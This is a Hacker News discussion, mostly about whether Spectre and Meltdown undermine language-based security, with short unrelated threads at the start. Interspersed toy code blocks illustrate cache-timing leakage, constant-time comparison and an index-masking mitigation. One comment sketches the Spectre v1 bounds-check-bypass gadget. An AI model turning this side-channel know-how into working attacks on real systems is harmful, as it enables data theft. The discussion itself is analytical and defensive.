[https://en.wikipedia.org/wiki/Willmore_energy](https://en.wikipedia.org/wiki/Willmore_energy)
------
mpweiher
1\. Frei Otto. (not Frie)
[https://en.wikipedia.org/wiki/Frei_Otto](https://en.wikipedia.org/wiki/Frei_Otto)
2\. He did the Olympic Stadion in Munich
(Yup, the Soap Films)
[http://stadiumdb.com/pictures/stadiums/ger/olympiastadion_mu...](http://stadiumdb.com/pictures/stadiums/ger/olympiastadion_munchen/olympiastadion_munchen01.jpg)
[https://en.wikipedia.org/wiki/Olympiastadion_(Munich)](https://en.wikipedia.org/wiki/Olympiastadion_\(Munich\))
3\. I live in a house created (in part) by him, the Ökohaus Berlin
[https://www.the-offbeats.com/articles/building-together-
the-...](https://www.the-offbeats.com/articles/building-together-the-okohaus-
frei-otto-collective-improvisation/)
| {
"pile_set_name": "HackerNews"
} |
Can you infer the purpose of these tools? - pookleblinky
http://farmtools101.blogspot.com/
======
jmah
Wow:
<http://farmtools101.blogspot.com/>
<http://toolanswers101.blogspot.com/>
I think they win the prize for best (ab)use of free Blogger accounts. And
reading the answers page alone is better than the quiz, unless you already
have some agricultural knowledge.
~~~
diN0bot
mos def. this was fascinating. made me question what i see in 3d printers when
more public hackershops and forges could enable so much!
------
sireat
Unless they blatantly scraped the information from somewhere, this is indeed
the best splog I've seen, actually interesting enough to read.
Spectre and the end of langsec - robin_reala
http://wingolog.org/archives/2018/01/11/spectre-and-the-end-of-langsec
======
forapurpose
I'm starting to consider whether this reflects a larger failure in the
industry/community: Traditionally, many of us (I'd say almost all) have been
focused on security at the OS level and above. We've assumed that the
processor and related hardware are safe and reliable.
However, below the OS level much new technology has been introduced that has
greatly increased the attack surface, from processor performance enhancements
such as branch prediction to subsystems such as Intel ME. I almost feel like
Intel broke a social compact that their products would be predictable, safe
commodities on which I can build my systems. But did those good old days ever
really exist? And of course, Intel naturally doesn't want their products to
be commodities, which likely is why they introduced these new features.
Focusing on OS and application security may be living in a fantasy world, one
I hesitate to give up because the reality is much more complex. What good are
OpenBSD's or Chrome's security efforts, for example, if the processor on which
they run is insecure and if there are insecure out-of-band management
subsystems? Why does an attacker need to worry about the OS?
(Part of the answer is that securing the application and OS makes attacks more
expensive; at least we can reduce drive-by JavaScript exploits. But now the OS
and application are a smaller part of the security puzzle, and not at all
sufficient.)
~~~
gibson99
The issue of hardware security really has been ignored too long in favor of
the quest for performance enhancement. Perhaps there is a chance now for
markets to encourage production of simplified processors and instruction sets
that are designed with the same philosophy as OpenBSD. I would imagine
companies and governments around the globe should have developed a new
interest in secure IT systems with news about major exploits turning up every
few months now it seems.
------
lclarkmichalek
Really not the end. The existence of issues that cannot be addressed via
'langsec' does not imply that we should give up on 'langsec'. There will be
more security issues due to buffer overflows than there will be CPU bugs this
year. More importantly, there will be orders of magnitudes more users with
data compromised via buffer overflows, compared to CPU bugs.
~~~
alxlaz
The author does not seem to mean "the end of langsec" as in "everyone will
give up on it", but rather the end of a period characterized, and not
incorrectly, by the opinion that a safe programming language guarantees the
absence of unintentional unsafe behaviour. In short, that things which, within
this "langsec framework", one could prove to be impossible, turn out to be
possible in practice; in the author's own words:
"The basis of language security is starting from a programming language with a
well-defined, easy-to-understand semantics. From there you can prove (formally
or informally) interesting security properties about particular programs. [..]
But the Spectre and Meltdown attacks have seriously set back this endeavor.
One manifestation of the Spectre vulnerability is that code running in a
process can now read the entirety of its address space, bypassing invariants
of the language in which it is written, even if it is written in a "safe"
language. [...] Mathematically, in terms of the semantics of e.g. JavaScript,
these attacks should not be possible. But practically, they work. "
This is not really news. The limits of formal methods were, in my opinion,
well-understood, if often exaggerated by naysayers, brogrammers or simply
programmers without much familiarity with them. Intuitively, it is not too
difficult to grasp the idea that formal proofs are exactly as solid as the
hardware which will run the program about which one is reasoning, and my
impression is that it was well-grasped, if begrudgingly, by the community.
(This is akin to the well-known mantra that no end-to-end encryption scheme is
invulnerable to someone looking over your shoulder and noting what keys you
type; similarly, no software-only process isolation scheme is impervious to
the hardware looking over its shoulder and "writing down" bytes someplace
where everyone can access them)
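The mechanism alxlaz describes can be sketched in a few lines of Python. This
is a deliberately abstract toy (a set standing in for the cache, fixed hit/miss
costs), not an exploit; it only shows why a cache footprint plus a timer
defeats language-level invariants:

```python
# Toy model of a cache timing side channel (illustration only): language
# semantics never let the attacker read `secret` directly, yet the cache
# footprint left by the victim's secret-dependent load leaks it via timing.

HIT, MISS = 1, 100  # arbitrary access-cost units

def victim(secret, cache):
    # A (possibly speculative) secret-indexed load caches one probe entry.
    cache.add(secret)

def attacker(cache, n=256):
    # The attacker only "times" each of the 256 candidate entries; the
    # single cheap (cached) one reveals which entry the victim touched.
    costs = [HIT if i in cache else MISS for i in range(n)]
    return costs.index(min(costs))

cache = set()
victim(secret=42, cache=cache)
print(attacker(cache))  # 42
```

Real attacks replace the set with actual cache state and the cost table with a
high-resolution timer, which is why browsers coarsened their timers after
Spectre was disclosed.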
~~~
allenz
> the end of a period characterized, and not incorrectly, by the opinion that
> a safe programming language guarantees...
I don't think that there was ever such a period. Provable correctness always
had the caveat of highly idealized assumptions, and we've known from the start
that hardware vulnerabilities such as timing attacks, rowhammer, gamma rays,
and power loss can undermine those assumptions.
------
nordsieck
> Rich Hickey has this thing where he talks about "simple versus easy". Both
> of them sound good but for him, only "simple" is good whereas "easy" is bad.
I don't think I've ever heard anyone mischaracterize his talk [1] this badly.
The claim is actually that simplicity is a fundamental property of software,
whereas ease of use is often dominated by the familiarity a user has with a
particular set of tools.
[1] [https://www.infoq.com/presentations/Simple-Made-
Easy](https://www.infoq.com/presentations/Simple-Made-Easy)
~~~
spiralganglion
Agreed, but I have seen a lot of people come away from the talk with an
unfortunate disdain for ease. Ironically, in disentangling "simple" and
"easy", Rich created a lot of confusion about the value of ease.
------
scott_s
My personal take is that perhaps chipmakers will start to see different market
pressures. Performance is the big one, and it's been around since the first
microprocessor. Power became increasingly more important, particularly in the
past decade, from both ends of the market. (Both mobile devices and
supercomputers are very power conscious.)
Security may become a new market pressure. You will likely sacrifice
performance to get it, as it will mean simpler cores, maybe in-order, and
probably without speculative execution. But, with simpler cores, we can
probably further increase hardware parallelism, which will only partially
mitigate the loss in single-threaded performance. Some chips may even be more
radically security conscious, and guarantee no shared caches between
processes. Such chipmakers would be able to say: we can't say for certain that
these chips are fully secure, but because they are simpler with less attack
vectors, we are far more confident they are. Security conscious chips may tend
to be the ones that are internet facing (your mobile device, cloud data
centers), and faster, less security conscious chips may only exist behind
strict firewalls.
I bring this up in response to the submitted article because I find it
unlikely that we will start to model processor insecurity at the language
level. It ruptures too many levels of abstraction. I find it more likely that
we will find ways to maintain those abstractions.
~~~
tzs
> Security may become a new market pressure. You will likely sacrifice
> performance to get it, as it will mean simpler cores, maybe in-order, and
> probably without speculative execution.
Maybe we go from having CPU + GPU to having CPU + GPU + FPU, where FPU = "Fast
Processing Unit".
The CPU in the CPU/GPU/FPU model becomes simpler. Any time we have to choose
between performance and security we choose security.
The FPU goes the other way. It is for things where speed is critical and you
either don't care if others on the machine can see your data, or you are
willing to jump through a few hoops in your code to protect your secrets.
For most of what most people do on their computers most of the time,
performance is fine without speculative execution or branch prediction and
probably even with caches that are completely flushed on every context switch.
(It will probably be fine to leave branch prediction in but just reset the
history on every context switch).
The FPU memory system could be designed so that there is a way to designate
part of FPU memory as containing secrets. Data from that memory is
automatically flushed from cache whenever there is a context switch.
~~~
sliverstorm
I believe you can make a process noncacheable today, and maybe even disable
branch prediction. This would totally shut down Spectre and Meltdown. You can
disable SMT, and there's a whole host of other things you can do to isolate
your "secure" process on an existing chip. Nobody has done these things
because they like performance.
_For most of what most people do on their computers most of the time,
performance is fine without speculative execution or branch prediction_
I think you underestimate the importance of branch prediction.
------
tdullien
I think this is too dark a post, but it shows a useful shock: Computer Science
likes to live in proximity to pure mathematics, but it lives between EE and
mathematics. And neglecting the EE side is dangerous - which not only Spectre
showed, but which should have been obvious at the latest when Rowhammer hit.
There's actual physics happening, and we need to be aware of it.
If you want to prove something about code, you probably have to prove microop
semantics upward from verilog, otherwise you're proving on a possibly broken
model of reality.
Second-order effects are complicated.
~~~
ddellacosta
Rowhammer I can understand, but how do you come to that
conclusion--"neglecting the EE side is dangerous"\--from analyzing Spectre?
Does speculative execution rely somehow on physical effects? I can't find
anything ( for example here:
[https://en.wikipedia.org/wiki/Spectre_(security_vulnerabilit...](https://en.wikipedia.org/wiki/Spectre_\(security_vulnerability\))
) that suggests there is a physical component to this vulnerability.
~~~
mst
I'd argue that using timing differences due to physical limitations of the
hardware to exfiltrate data based on whether or not it's cached is very
definitely 'relying on physical effects'
~~~
ddellacosta
> timing differences due to physical limitations of the hardware
I see; so you're talking about step two as described here, do I have that
right?
[https://en.wikipedia.org/wiki/Spectre_(security_vulnerabilit...](https://en.wikipedia.org/wiki/Spectre_\(security_vulnerability\)#Detailed_explanation)
This seems like a failure of algorithm design to me, in the sense of not
starting with a better model that more accurately encodes the possibility of
timing attacks. That being the case it appears to me to be a problem still
firmly residing in the domain of computer science.
But, I'm a programmer, not a chip designer, and I have very little knowledge
of this field, so I'm probably biased and not thinking about this correctly or
with enough nuance.
~~~
mst
Quoting the thread root:
> Computer Science likes to live in proximity to pure mathematics, but it
> lives between EE and mathematics
which doesn't disagree with "firmly residing in the domain of computer
science" \- it's merely a question of nobody having factored the right bit of
EE into the right bit of math to get the right model.
------
perlgeek
I don't see how this is fundamentally different than timing attacks and other
side channel attacks that have been well known before, and to the best of my
knowledge, simply hasn't been the focus of the "prove it correct" approach.
Whenever you want to prove something correct, you need to make assumptions
about the execution model, and about what correctness means. Now "we" as an
industry found a bug that makes the actual model differ from the assumed
model, so we need to fix it.
The same is true when you can measure the power used by a microchip during
some cryptographic operation, and infer the secret key from that -- even if
the cryptographic operation has been proven correct, the definition of
correctness likely didn't include this factor.
------
KirinDave
While langsec can't easily mitigate spectre because the processor is trying to
hide where the performance comes from, it's worth noting that several new
languages are working on ways to write code where you can actually assert and
have the compiler check that the timing of the code you write is bounded and
uniform.
It's very easy, I think, to throw up our hands and say, "Well gosh all this
language stuff is useless because timing attacks are so scary!" But in
reality, they're pretty well studied and many of them are actually pretty
simple to understand even if they can be hard to recognize.
Both hardware AND software sides of our industry need to start taking
correctness, both at compile and runtime, seriously. The days where we can
shrug and say, "But that's too slow, don't run code you don't trust" are dead.
We killed them by ceding the idea of hardware ownership to big CSPs. The days
where we can say, "This is too complicated to do!" or "This doesn't deliver
customer value!" are also going away; the threat of combination attacks easily
overshadows any individual attack, and small vulnerabilities tend to multiply
the total surface area into truly cataclysmic proportions.
But also gone is the day when we can say things like, "Just use Haskell or
OCaml!" We've seen now what these environments offer. It's a great start and
it's paved the way for a lot of important understanding, but even that is
insufficient. Our next generation of programming environments needs to require
less abstract category theory, needs to deliver more performant code, and
needs to PROVE properties of code to the limit of runtime resolution. The
hardware and OS sides of the equation need to do the same thing. And we as
engineers need to learn these tools and their techniques inside and out; and
we shouldn't be allowed to sell our work to the general public if we don't.
~~~
zbentley
> several new languages are working on ways to write code where you can
> actually assert and have the compiler check that the timing of the code you
> write is bounded and uniform.
I'm interested in how that would avoid the halting problem. Let's say I write
code, compile it, and run some "timing verifier" on it. That verifier either
runs my code and verifies that its timing is correct _on that run_ , or
inspects the machine code against a known specification of the hardware I'm
running it on _right then_ and ensures all of the instructions obey my timing
constraints. How would you check that the code's timing is bounded and uniform
on subsequent executions? Or on other hardware? Or in the face of
specifications that are incorrect regarding the timing characteristics of
machine code instructions (CPU/assembly language specs are notoriously
incomplete and errata-filled).
I suspect something fundamental would have to be changed about computer design
(e.g. a "CPU, report thine own circuit design in a guaranteed-accurate way")
to make something like this possible, but am not sure what that would be, or
if it's feasible.
~~~
UncleMeat
It avoids the halting problem the same way literally all sound static analysis
does. With false positives. The java type checker will reject programs that
will not have type errors at runtime. And a system that verifies timing
assertions with SMT or whatever will reject some programs that will not fail
the assertion.
The halting problem has never actually stopped static analysis tools. Static
analysis tools that check timing assertions have been around for a very long
time.
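That soundness-via-false-positives trade-off is easy to demonstrate with a toy
checker (hypothetical, not any real tool): a sound loop-bound analysis that
accepts only loops with an obvious constant bound, and so rejects some
programs that do in fact terminate:

```python
# Toy sound analysis: accept only `for _ in range(<int literal>)` loops and
# conservatively reject everything else (while-loops, computed ranges, ...).
# It never accepts an unbounded program, at the cost of false positives.
import ast

def has_constant_bound_loops(src):
    tree = ast.parse(src)
    for node in ast.walk(tree):
        if isinstance(node, ast.While):
            return False  # might not terminate -> reject
        if isinstance(node, ast.For):
            it = node.iter
            ok = (isinstance(it, ast.Call)
                  and isinstance(it.func, ast.Name) and it.func.id == "range"
                  and len(it.args) == 1
                  and isinstance(it.args[0], ast.Constant)
                  and isinstance(it.args[0].value, int))
            if not ok:
                return False
    return True

print(has_constant_bound_loops("for i in range(10): pass"))  # True
print(has_constant_bound_loops("while x < 10: x += 1"))      # False: terminates, but rejected
```

Industrial WCET and timing-assertion tools are vastly more sophisticated, but
they resolve undecidability the same way: by over-approximating.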
~~~
zbentley
Sure, but this isn't a static analysis tool in the same way a type system is.
This is an analysis tool which checks for mostly platform-unrelated, entirely
runtime behavior which can vary based on a lot of external factors.
When you say "Static analysis tools that check timing assertions have been
around for a very long time.", what are you referring to? I've used analyzers
that check for potentially-inescapable loops, do assembly/machine code
operation counts, and look for the presence of interruptions that are _known_
to take a potentially infinite/nondeterministic amount of time (waiting for
I/O), or ones whose _lower_ bound in time is known (scheduler interactions
like sleep). How would you analyze for instructions which have theoretically-
constant times, but which in practice are vulnerable to "constant plus or
minus"-type timing attacks like Spectre? How would that analysis yield results
we don't already know, a la "in this section of code, you should
obfuscate/prevent the gathering of timing data, and/or try to defeat
speculative execution"?
~~~
KirinDave
There is no one here saying that there is a runtime that can protect against
Spectre. Spectre is just one of extreme example of timing attacks which have
been troubling our industry for the better part of a decade.
It's entirely possible to prove that some types of code do not significantly
vary their running time based on the character of their input. A classic
example of this is a hashing algorithm whose execution time depends only on
the length of the input.
I'm not sure if people recall password oracles but they're still valid attacks
today. We can only eliminate these by starting at the bottom and working our
way up.
If your response to Spectre is to give up on your computer security, I don't
think I want you writing software for me. These are the challenges our
industry has to face. Failure is not really an option.
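The constant-time property mentioned above is easy to illustrate in Python:
`hmac.compare_digest` is the standard-library primitive for it, while the
naive loop below is the classic oracle-prone version:

```python
import hmac

def naive_equal(a: bytes, b: bytes) -> bool:
    # Leaks timing: returns at the first mismatching byte, so an attacker
    # measuring response time can confirm a guessed secret one byte at a
    # time (the "password oracle" pattern).
    if len(a) != len(b):
        return False
    for x, y in zip(a, b):
        if x != y:
            return False
    return True

def constant_time_equal(a: bytes, b: bytes) -> bool:
    # Runtime depends only on the lengths, not on where the bytes differ.
    return hmac.compare_digest(a, b)

print(constant_time_equal(b"secret", b"secret"))  # True
print(constant_time_equal(b"secret", b"seXret"))  # False
```

The languages KirinDave mentions aim to let the compiler verify this property
instead of leaving it to reviewer discipline.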
------
hacknat
Everyone is assuming the author is giving up on Langsec. Read carefully, he
called Spectre/Meltdown a setback. I think he’s making a subtler point that
the fundamentals of programming have become more of a pragmatic activity than
a mathematical one, if you’re being practical about your goals that is. I’m
currently on the kubernetes multi-tenancy working group (which isn’t really a
working group yet) and its really funny to see how much effort is going into
securing containers, but core bits like the CNI receive little attention. A
wise security professional, an ex-hacker, said that he actually liked over-
engineered security systems as a hacker, because it told him what not to focus
on. Container security pretty good? Okay then figure out how to do what you
want without breaking out of the container (definitely possible in the case of
Spectre/Meltdown).
There is a fundamental cognitive bias in our field to solve the technically
challenging problems without realizing that there are practical
vulnerabilities that are far more dangerous, but a lot more boring to solve
(the most common way orgs are exploited is through a combination of social
attacks and something really trivial).
I think the author is frustrated because he feels the interesting work is
unimportant in comparison to the practical.
That isn’t to say that this work isn’t helpful. I’m very glad to be working
daily in a typesafe, memory safe language, but I have bigger fish to fry now
as a security professional on the frontline.
------
saulrh
On the one hand, langsec specifically handles these problems. A program for
searching through a file will produce the same results whether it runs in a
tenth of a second or ten seconds, and as such doesn't need to - in langsec,
shouldn't be _able_ to - access the time. That's what langsec is. It can even
identify hazards like the SharedArrayBuffer high-res timers that compare the
execution speed of different programs by communicating between processes; most
programs shouldn't care which thread finished first, so that information
shouldn't be available! And so we build formalisms for computing that don't
make that information available to the program.
On the other hand, that's probably infeasible for the real world. Humans care
about time too much for it to be declared off-limits to many programs.
Similarly with things like communicating processes. These attacks are so
fundamental that it'd be effectively impossible to build a program that didn't
throw up an impenetrable wall of critical langsec violations.
So I'm not sure. The langsec framework _does_ offer a solution. It might just
be that, in the same way that things like Haskell offer their solutions, it's
too difficult for the real world to apply it.
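The "don't hand programs the clock" idea can be sketched as a capability-style
API (all names here hypothetical): time is observable only through an
explicitly passed capability, so a plain search function visibly has no access
to it:

```python
# Capability-style sketch of the langsec idea above: whether code can
# observe time is part of its type signature, not ambient authority.
import time
from typing import Callable, List

Clock = Callable[[], float]  # the only way to read time

def grep(lines: List[str], needle: str) -> List[str]:
    # No Clock parameter: by construction this search cannot observe time,
    # so its result is the same whether it runs in 0.1s or 10s.
    return [l for l in lines if needle in l]

def timed(clock: Clock, f, *args):
    # Code that *does* need timing must ask for the capability explicitly.
    t0 = clock()
    out = f(*args)
    return out, clock() - t0

print(grep(["spam", "ham", "spam eggs"], "spam"))  # ['spam', 'spam eggs']
```

As the comment notes, the hard part isn't expressing this; it's that too much
real-world code legitimately wants the clock.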
------
willvarfar
There are CPUs that are immune to these attacks, including Spectre.
The CERT recommendation was to throw away affected CPUs and use alternatives.
Now this isn't very realistic today when the in-order alternatives are slow
and not comparable performance. But it does say that CERT is not giving up on
langsec.
(Team Mill - we're immune too and will put out a light paper on how these
attacks apply to in-order processors that support speculation and what we're
doing to prevent them)
~~~
gbrown_
> Team Mill - we're immune too and will put out a light paper on how these
> attacks apply to in-order processors that support speculation and what we're
> doing to prevent them
Will this be sent to the mailing list when released?
~~~
willvarfar
Yes probably.
I've already written the paper and it's just got to survive a lot of peer
review. It turns out that it would be real easy to envisage an in-order
processor that has some mechanism for speculation that was actually vulnerable
to spectre and variations of meltdown and the paper explores that - so
hopefully it's an interesting paper even if the tl;dr is we claim to be
immune.
~~~
cwzwarich
I'm curious, because I think the Mill as described in the talks is vulnerable
to a variant of Spectre. If you have a sequence of code like this:
if (index < bounds) {
    index2 = array1[index];   // first speculated load: out-of-bounds, attacker-controlled
    ... array2[index2];       // second speculated load leaks index2 via the cache
}
If the compiler speculates both array accesses above the bounds check, then
the first one can still succeed (i.e. not produce a NaR) while accessing
attacker-controlled memory for the value of index2.
You could obviously fix this by never generating code that does double
speculation, but you could also do that by modifying a conventional OoO
microarchitecture.
~~~
willvarfar
Spot on!
This variant of Spectre would be software bug not a hardware bug on the mill.
Our specialiser had to be fixed to _not_ produce code with this flaw.
And so we wrote a light paper on it, and perhaps a talk etc ;)
~~~
cwzwarich
It seems that Mill's combination of a single address space and speculation-
before-permissions-checks is still quite vulnerable to an ASLR leak. Have you
made any changes to mitigate this, or do you just consider address space
layout leaks acceptable behavior?
~~~
hduty
seriously? Mill is/will do speculation before perms? And here I thought turfs
were the elegant answer to this nightmare.
~~~
cwzwarich
See slide 72 of the metadata talk[1] and slide 51 of the IPC talk[2], which
indicate that it does speculation before permissions checking.
Since turf permissions operate on the granularity of an arbitrary address
range (rather than a page like traditional MMUs), the permissions cache (what
the Mill calls a PLB) has a worse latency/power tradeoff than a traditional
TLB. The Mill takes advantage of its single address space and reduces some of
this hit by doing permissions checks in parallel with the access.
[1]
[https://millcomputing.com/docs/metadata/](https://millcomputing.com/docs/metadata/)
[2] [https://millcomputing.com/docs/inter-process-
communication/](https://millcomputing.com/docs/inter-process-communication/)
~~~
willvarfar
Thank you for watching the talks! :D
Luckily its not quite as you interpreted:
The L1$D is accessed in parallel with the PLB. Both at top-level caches - one
for data, one for protection.
If there is a PLB miss we have no cache-visible side-effects until the
protection has been resolved.
The paper we're preparing will cover this in detail, because as you can see,
the talks are a bit light on exactly what happens in what order when here.
------
barbegal
One of the big problems with Spectre and Meltdown is that they are due to
behaviours and components of a processor that are not well documented. Caches,
branch predictors, out of order execution and superscalar execution are all
things that processor vendors refuse to disclose any information about because
it is so commercially sensitive. Indeed CPUs are now primarily differentiated
by these features. We are no longer getting processors with faster clocks or
even smaller transistors so a lot of research has gone into making individual
instructions run faster (or at least run faster most of the time).
Neither Intel, ARM nor AMD has disclosed why their CPU designs are, or are not,
vulnerable to Spectre and Meltdown. If the developers of compilers or even
operating systems don't know exactly how the hardware works then it is pretty
hard for them to know that they haven't written vulnerable code. By the same
token, it is also hard for them to know if they have written performant code.
And we know even less about other types of processors that exist in almost
every chip such as GPUs, digital signal processors, video processor units
(VPUs) and other hardware accelerators. Those processors can almost certainly
also leak data from other parts of the system, they have their own caches and
sometimes branch predictors. Although it is hard to specify the code that runs
on these devices it is almost certainly still possible to exploit bugs and
timing attacks in them.
We are essentially getting security through the obscurity of the devices and
security through obscurity is no good.
So should we have processor architectures which are completely open? In some
ways that would destroy most vendor's business models. But having more
openness could lead to more divergent processor architectures as vendors try
to differentiate themselves and it should improve the security of our systems.
------
xg15
Welcome to the cyberwar.
I think the basic problem with the breakdown of static analysis tools like this
one, or of optimisations like speculative execution, is that they were built in
a different time for significantly different requirements.
When the theories were developed, the main concern was to prove correctness
and protect against accidents. Yes, the OS isolated processes from each other
and protected memory boundaries - but this was added to keep a crashing
process from corrupting other processes and bringing down the whole OS. It was
_not_ developed to contain an actively malicious process.
At some point the paradigm changed and the idea spread that an OS shouldn't
just protect against misbehaving _code_ but also against misbehaving
_programmers_. That led to the current practice of compartmentalizing a
machine in different areas of trust and tightly restricting what a program
_can_ do - and at the same time permitting increasing amounts of "untrusted"
code to run because we trust the boundaries so much.
I think the general paradigm shift has some worrying sides, but more
importantly, it was never explicitly discussed and it was never discussed if
the current tools of software and hardware development can even support that
new paradigm.
So yeah, in short, I think we are currently discovering that our houses are in
fact not built to withstand a 20kton TNT blast set off at the front door. So
far this hadn't been a problem as random violent explosions used to be a rare
occurrence. Somehow we got ourselves in a situation where they aren't rare
anymore.
------
qubex
Am I wrong in recalling that Itanium (IA-64) was an in-order architecture that
relied on the compiler to explicate the potential for parallelism? Again, if I
recall correctly, the struggle to construct compilers that could do this
versus the apparent success (and lack of trade-offs) in letting in-processor
circuitry to reshuffle instructions at run-time was one of the main reasons
why _x_ 86’s 64-bit extensions prevailed (the other being poor performance
when running legacy _x_ 86 32-bit code).
Now it turns out that we really were benefitting from an advantage that had a
hidden cost, not in terms of performance (though power might be a concern) but
in terms of breaking the implicit model we have of how software executes, and
that this disconnect in turn opens us to a host of “architectural” risks and
metaphor breakages.
Maybe at this point we should consider reverting to the original plan and
insist on compilers doing the legwork, so that approaches such as langsec have
a hope of succeeding. Systems must be comprehensible (at least in principle)
and reliably deterministic from the top all the way to the bottom.
~~~
gpderetta
Itanium relies on advance loads, which are a form of speculation introduced by
the compiler to perform competitively. It is not unlikely that this is as
exploitable as Spectre.
~~~
qubex
I respectfully disagree for two main reasons. Firstly, because the compiler is
not transversal to all processes currently executing on the system at runtime,
so it isn’t a ”unifying step” that conjoins otherwise independent processes
and can allow them to interact. Secondly, if the compiler were found to be
leaking state between processes, simply changing the compiler’s logic would
allow rectification of these issues (albeit at the expense of recompiling all
software with the new compiler), with circuits etched onto a processor die one
has no such opportunity. What could be (at least potentially) an open-source
fix becomes the umpteenth binary blob from an opaque entity that tell us to
”trust them because [they] know best”.
~~~
gpderetta
Spectre is not (at least not directly), a cross address space vulnerability
(although it can be exploited in some cases from other address spaces).
A JS JIT running on Itanium that generates advanced loads before bounds checks
will be vulnerable.
It is true that it can be fixed purely by software changes, by simply avoiding
issuing advanced loads [1], but then again software changes can also plug the
spectre v1 vulnerability on OoO architectures by adding artificial
dependencies on load-load sequences (see the WebKit mitigation article that
was discussed here a few days ago). Both software fixes have potentially
significant performance issues (more so on in-order architectures).
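The software fix mentioned here - adding an artificial data dependency so a load cannot be speculatively issued ahead of its bounds check - can be sketched roughly as follows. This is an illustrative example, not WebKit's actual code; `clamp_index` and `safe_read` are hypothetical names:

```c
#include <stdint.h>
#include <stddef.h>

/* Branchless index clamp: the mask computation creates a data dependency
 * between the bounds comparison and the load address, so even a
 * mispredicted bounds-check branch cannot speculatively read out of
 * bounds - out-of-range indices are forced to 0. */
static inline size_t clamp_index(size_t idx, size_t len) {
    /* all-ones when idx < len, all-zeros otherwise */
    size_t mask = (size_t)0 - (size_t)(idx < len);
    return idx & mask;
}

uint8_t safe_read(const uint8_t *table, size_t len, size_t idx) {
    if (idx >= len)
        return 0;                        /* architectural bounds check */
    return table[clamp_index(idx, len)]; /* speculative reads pinned to table[0] */
}
```

The cost is a couple of extra ALU operations per guarded load; on an in-order machine whose compiler hoists loads aggressively to stay competitive, the same masking would have to be applied to every hoisted load, which is why the performance impact is larger there.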
So yeah, in-order CPUs are less microarchitecturally vulnerable [2] to spectre
by default, but the compiler tricks required to make them competitive with OoO
CPUs might reintroduce the issue.
[1] In principle compiler issued prefetches and load hoisting can be an issue
on OoO CPUs as well, but as these are less important for performance compilers
can be more conservative. On the other hand some VLIW architectures have
special instructions and architectural support (like Itanium ALAT) to make
this load hoisting easier.
[2] There are in-order ARM CPUs that have been reported to be affected though.
~~~
gpderetta
Thinking more about this, the vulnerability would be in any load issued
speculatively whose address depends on the result of a previous load.
This can be detected at compile time, and avoiding just this scenario would
not have as large a performance impact as avoiding every speculative load.
------
urbit
Here's a more optimistic take which is unavoidably a plug.
Urbit is maybe a sort of "extreme langsec." "Immune" is a dangerous word.
Urbit is "premitigated" against Spectre for the following reasons, some cool
and others stupid:
(1) The Nock VM has no O(n) data structures, ie, arrays. This was not anything
to brag about till now.
(2) Urbit events are interpreted in their own process, which is one trust
domain (one process, one "personal server").
(3) A personal server isn't a browser and doesn't habitually run code its
owner doesn't trust.
(4) Urbit is purely functional, so you only know the time if someone passes
you the time.
(5) Top-level event handlers are passed the time of the event. This is easy to
fuzz.
(6) If you are running untrusted foreign code, it is probably just a function.
Giving this function a measured time interval from top-level event times would
be strange. And it would need another channel to exfiltrate the stolen data.
Never say never, but this combination of premitigations makes me worry about
Spectre very little. Although, when we do have a less-trusted tier of
applications (walk before run), ain't nobody is going to be telling them the
time.
Besides the plug, the lesson there is that one of the reasons Spectre is a
problem is that langsec is an imperfect bandaid.
Urbit is premitigated because it was designed as a functional system from the
ground up. The JS environment is functional lite -- it allows typeless
functional programming, but it also retains many mutable/imperative systems
design tropes.
It's these tropes that have become clever attack vectors. If you don't want to
get Spectred, build systems that are formal and functional all the way down.
~~~
drbawb
>(5) Top-level event handlers are passed the time of the event. This is easy
to fuzz.
Therein lies the rub -- if your program does not have access to precise timing
information, it is by definition not operating at the full capability of the
hardware which runs it. That's a hard sell to many domains.
Consider gaming. At 144Hz w/ 4K resolution you have about 6ms to render a
frame: that's roughly 0.7ns per pixel. If for a moment we imagine that it takes
approximately 1 machine cycle per pixel to render a scene: that means you need
to be operating at nearly 1.4GHz just to meet the deadline for drawing to the frame
buffer. -- That's before you consider memory & cache latency, or the fact that
your multitasking OS is stealing resources for itself & other competing
processes.
So no, one cannot just fuzz performance counters in the name of security. Any
soft-realtime or hard-realtime domain is going to expect the machine to
actually perform as advertised.
~~~
tartis
You are right: by definition real-time tasks will always be vulnerable.
With regard to Urbit, it is a non-issue because there are no use cases which
would warrant access to soft or hard-realtime for a networked OS.
Such tasks will always happen on client-side, by virtue of network latency.
------
zbentley
> Spectre shows us that the building blocks provided to us by Intel, ARM, and
> all the rest are no longer "small parts understood entirely"; that instead
> now we have to do "basic science" on our CPUs and memory hierarchies to know
> what they do.
I object to the term "no longer" in that sentence. There exist old CPUs that
are not vulnerable to these attacks, but their existence doesn't mean that
when those CPUs were in widespread use they were "understood entirely". I
imagine that most programmers affected by the F00F vulnerability in Pentiums
didn't fully understand what it was about the chip/microcode that caused the
lockup, either.
The parts being assembled change over time, but I think you can always say
"bah, {kids|engineers|scientists|etc} nowadays don't know how the things
they're plugging together work" and be trivially "correct" without making any
constructive point about how to go back to some nonexistent past in which
things were understood. Even when computers ran on vacuum tubes and physical
insects in machines as "bugs"
([apocryphal]([https://www.computerworld.com/article/2515435/app-
developmen...](https://www.computerworld.com/article/2515435/app-
development/moth-in-the-machine--debugging-the-origins-of--bug-.html)), I
know), people didn't know the composition of the hardware. Would one of those
programmers, on average, be more likely to fully understand, say the heat
range required for successfully making circuits in a tube or the effects of
anode corrosion on the lifespan of a tube, than a modern-day programmer would
understand how CPU microcode works?
The amount of complexity per part might go up over time. But there's always a
specialized threshold for "low level" understanding below which a) most people
don't operate and b) dragons lurk.
------
jokoon
I find it weird and worrying that you cannot easily analyze the safety of a
program with some form of static analysis, or that there is no way to do an
automated security audit.
I have been complaining for a long time that there is no organized effort
(state, government, scholars or otherwise) to teach basic software security in
programming. There is no ISO standard for computer security, or at least
there is nothing really relevant being taught. Security certifications don't
really mean anything, or it seems nobody cares enough.
I guess governments will have to get preoccupied with those things, because
you can clearly see that for now, it's an arms race kind of strategy, as long
as the NSA has the upper hand, things are okay, but if it becomes a bigger
national security concern, things might change. I guess you can smell that the
russians are getting good enough and that it's time to make internet security
a more prevalent matter for developers.
~~~
qubex
How can you hope to statically analyse something that executes non-
deterministically and whose state depends on the goings-on of all the
processes simultaneously hosted on that system? The whole point the author is
making is that there is a step at the bottom of all formal reasoning
hierarchies that doesn’t behave deterministically and thus undermines formal
reasoning about everything built above it. It’s just that we had never
recognised it as existing because we conveniently abstracted away this
reordering of instructions and thus had a model of the runtime environment
that doesn’t match with reality.
------
coldtea
> _Mathematically, in terms of the semantics of e.g. JavaScript, these attacks
> should not be possible. But practically, they work._
Obviously this is badly stated.
